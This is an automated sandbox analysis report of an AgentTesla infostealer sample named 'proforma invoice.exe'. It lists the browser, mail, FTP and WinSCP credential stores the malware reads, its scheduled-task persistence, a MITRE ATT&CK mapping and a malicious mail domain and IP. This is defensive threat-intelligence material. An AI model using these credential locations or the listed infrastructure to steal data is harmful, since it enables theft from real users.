Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Users\user\Desktop\proforma invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Users\user\AppData\Roaming\CGWlZD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Users\user\AppData\Roaming\CGWlZD.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\proforma invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.proforma invoice.exe.416aec8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2580742665.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2580742665.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2581503168.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2581503168.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proforma invoice.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: proforma invoice.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CGWlZD.exe PID: 8100, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\proforma invoice.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\CGWlZD.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\proforma invoice.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 0.2.proforma invoice.exe.416aec8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2580742665.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2581503168.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proforma invoice.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: proforma invoice.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CGWlZD.exe PID: 8100, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.proforma invoice.exe.416aec8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2580742665.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2580742665.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2581503168.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2581503168.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proforma invoice.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: proforma invoice.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CGWlZD.exe PID: 8100, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	2 Obfuscated Files or Information	1 Credentials in Registry	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	23 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
proforma invoice.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
proforma invoice.exe	57%	Virustotal		Browse
proforma invoice.exe	100%	Avira	HEUR/AGEN.1305708
proforma invoice.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\CGWlZD.exe	100%	Avira	HEUR/AGEN.1305708
C:\Users\user\AppData\Roaming\CGWlZD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\CGWlZD.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mail.iaa-airferight.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.elderscrolls.com/skyrim/character	0%	Avira URL Cloud	safe
http://mail.iaa-airferight.com	100%	Avira URL Cloud	malware
http://www.elderscrolls.com/skyrim/character	0%	Virustotal		Browse
http://mail.iaa-airferight.com	8%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.iaa-airferight.com	46.175.148.58	true	true	8%, Virustotal, Browse	unknown
api.ipify.org	104.26.13.205	true	false		high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.elderscrolls.com/skyrim/character	proforma invoice.exe, CGWlZD.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ipify.org	proforma invoice.exe, 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, proforma invoice.exe, 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp, proforma invoice.exe, 00000009.00000002.2580742665.0000000003231000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000E.00000002.2581503168.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.elderscrolls.com/skyrim/characterT	proforma invoice.exe, CGWlZD.exe.0.dr	false		high
https://account.dyn.com/	proforma invoice.exe, 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, proforma invoice.exe, 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	proforma invoice.exe, 00000009.00000002.2580742665.0000000003231000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000E.00000002.2581503168.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	proforma invoice.exe, 00000000.00000002.1344796057.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, proforma invoice.exe, 00000009.00000002.2580742665.0000000003231000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000A.00000002.1421648447.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000E.00000002.2581503168.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.elderscrolls.com/skyrim/player	CGWlZD.exe, 0000000A.00000002.1421648447.00000000033FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.iaa-airferight.com	proforma invoice.exe, 00000009.00000002.2580742665.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000E.00000002.2581503168.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
46.175.148.58	mail.iaa-airferight.com	Ukraine		56394	ASLAGIDKOM-NETUA	true
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571276
Start date and time:	2024-12-09 08:32:34 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	proforma invoice.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/13@2/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 98% Number of executed functions: 371 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target proforma invoice.exe, PID 7644 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:33:24	API Interceptor	179x Sleep call for process: proforma invoice.exe modified
02:33:28	API Interceptor	42x Sleep call for process: powershell.exe modified
02:33:32	API Interceptor	190x Sleep call for process: CGWlZD.exe modified
08:33:26	Task Scheduler	Run new task: CGWlZD path: C:\Users\user\AppData\Roaming\CGWlZD.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.175.148.58	Overdue_payment.pdf.exe	Get hash	malicious	AgentTesla	Browse
	PO for fabric forecast.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	980001672 PPR for 30887217.scr.exe	Get hash	malicious	AgentTesla	Browse
	lC7L7oBBMC.exe	Get hash	malicious	AgentTesla	Browse
	OHScaqAPjt.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	RFQ ENQ186 OI REQUIRE RATE.exe	Get hash	malicious	AgentTesla	Browse
	v58HgfB8Af.exe	Get hash	malicious	AgentTesla	Browse
	l6F8Xgr0Ov.exe	Get hash	malicious	AgentTesla	Browse
	SPlVyHiGOz.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	2bOizaPPDC.exe	Get hash	malicious	AgentTesla	Browse
104.26.13.205	BiXS3FRoLe.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	lEUy79aLAW.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.iaa-airferight.com	Overdue_payment.pdf.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	PO for fabric forecast.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	46.175.148.58
	980001672 PPR for 30887217.scr.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
